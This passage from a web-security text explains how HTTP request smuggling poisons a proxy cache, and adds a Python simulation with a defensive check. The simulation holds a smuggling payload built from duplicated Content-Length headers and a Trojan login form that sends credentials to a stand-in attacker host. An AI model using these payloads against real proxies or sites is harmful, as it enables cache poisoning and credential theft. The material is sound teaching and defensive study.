7. The application issues its actual response to the attacker's second request, containing the authentic contents of the URL http://wahh-app.com/admin/. The proxy server has already received a response for every request it forwarded, so it does not recognize this as a response to a request that it has actually issued, and discards it.
8. A user accesses http://wahh-app.com/admin/ via the proxy server and receives the content of this URL that was stored in the proxy's cache. This content is in fact the attacker's Trojan login form, so the user's credentials are compromised.
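The following is an added example, not code from the book, that models the sequence of events behind steps 7 and 8 in a few dozen lines of Python. The earlier steps of the attack are not shown in this excerpt, so the example assumes the classic cause of the desynchronization: the attacker's first request carries two Content-Length headers, the proxy honours the last value and the back-end the first. The paths /index.html and /poison.html, the host attacker.example and the page bodies are all constructed for the demonstration. The example also includes the check a hardened proxy should make, refusing any request whose framing is ambiguous, so that the smuggled request is never forwarded at all.

```python
# Added example (not from the book). Assumptions, all labelled: the desync comes from
# duplicated Content-Length headers, the proxy honours the LAST value and the back-end
# the FIRST; paths, hosts and page bodies below are constructed for the demonstration.

CRLF = "\r\n"

# Constructed origin content. /poison.html is attacker-controlled (e.g. an uploaded
# page); /admin/ is the genuine page whose cache entry the attack replaces.
ORIGIN = {
    "/index.html": b"<html>welcome</html>",
    "/admin/": b"<html>genuine admin login form</html>",
    "/poison.html": b"<form action='http://attacker.example/steal'>Trojan login form</form>",
}


def content_lengths(header_lines):
    """All Content-Length values in a request head, in order of appearance."""
    return [int(line.split(":", 1)[1]) for line in header_lines
            if line.lower().startswith("content-length:")]


def parse_requests(stream: bytes, honour_last_content_length: bool, strict: bool = False) -> list:
    """Split one TCP stream into HTTP requests.

    The proxy and the back-end differ only in which Content-Length they trust when the
    header is duplicated; that single disagreement turns one request on the proxy's
    side into two on the back-end's side. With strict=True the duplicate is rejected
    instead, which is what RFC 7230 requires for differing values.
    """
    requests, pos = [], 0
    while pos < len(stream):
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break  # incomplete request: wait for more bytes
        lines = stream[pos:head_end].decode().split(CRLF)
        method, path, _version = lines[0].split(" ", 2)
        lengths = content_lengths(lines[1:])
        if strict and len(lengths) > 1:
            raise ValueError(f"ambiguous Content-Length in request for {path}")
        length = 0 if not lengths else (lengths[-1] if honour_last_content_length else lengths[0])
        body_start = head_end + 4
        body = stream[body_start:body_start + length]
        if len(body) < length:
            break
        requests.append({"method": method, "path": path, "body": body})
        pos = body_start + length
    return requests


def origin_serve(stream: bytes) -> list:
    """Back-end: parses with the FIRST Content-Length and answers each request in order."""
    return [ORIGIN.get(r["path"], b"404") for r in parse_requests(stream, honour_last_content_length=False)]


class CachingProxy:
    """Forwarding proxy that caches GET responses and pairs responses with the requests
    it forwarded purely by arrival order, as the proxy in steps 7 and 8 does."""

    def __init__(self):
        self.cache = {}
        self.discarded = []

    def forward(self, client_stream: bytes) -> list:
        proxy_view = parse_requests(client_stream, honour_last_content_length=True)
        responses = origin_serve(client_stream)  # bytes pass through unchanged
        for req, resp in zip(proxy_view, responses):
            if req["method"] == "GET":
                self.cache[req["path"]] = resp  # the Trojan page lands under /admin/
        # Step 7: a response that matches no outstanding request is simply dropped.
        self.discarded.extend(responses[len(proxy_view):])
        return responses[:len(proxy_view)]

    def get(self, path: str) -> bytes:
        """Step 8: a later user's request, served from the cache when an entry exists."""
        if path in self.cache:
            return self.cache[path]
        return origin_serve(f"GET {path} HTTP/1.1{CRLF}Host: wahh-app.com{CRLF}{CRLF}".encode())[0]


# Attacker's first request: the proxy sees one POST whose body is SMUGGLED; the
# back-end sees an empty POST followed by a complete request for /poison.html.
SMUGGLED = f"GET /poison.html HTTP/1.1{CRLF}Host: wahh-app.com{CRLF}{CRLF}".encode()
ATTACK_REQ1 = (f"POST /index.html HTTP/1.1{CRLF}Host: wahh-app.com{CRLF}"
               f"Content-Length: 0{CRLF}Content-Length: {len(SMUGGLED)}{CRLF}{CRLF}").encode() + SMUGGLED
# Attacker's second request: the proxy pairs it with the response to /poison.html.
ATTACK_REQ2 = f"GET /admin/ HTTP/1.1{CRLF}Host: wahh-app.com{CRLF}{CRLF}".encode()


def run_attack() -> CachingProxy:
    proxy = CachingProxy()
    proxy.forward(ATTACK_REQ1 + ATTACK_REQ2)
    return proxy


def hardened_proxy_accepts(stream: bytes) -> bool:
    """A proxy that refuses ambiguous framing never forwards the attack in the first place."""
    try:
        parse_requests(stream, honour_last_content_length=True, strict=True)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    p = run_attack()
    print("cached for /admin/:", p.cache["/admin/"])
    print("discarded by proxy:", p.discarded)
    print("hardened proxy forwards attack:", hardened_proxy_accepts(ATTACK_REQ1 + ATTACK_REQ2))
```

Running run_attack() shows the proxy's view of the stream as two requests and the back-end's view as three; the extra response (the genuine /admin/ page) is the one discarded in step 7, and a subsequent proxy.get("/admin/") returns the Trojan form from the cache exactly as in step 8. The parsing model is deliberately minimal, but the pairing-by-order behaviour is the property that matters, and it is why the fix belongs at the proxy: rejecting any request with more than one Content-Length value, as hardened_proxy_accepts does, removes the disagreement the attack depends on.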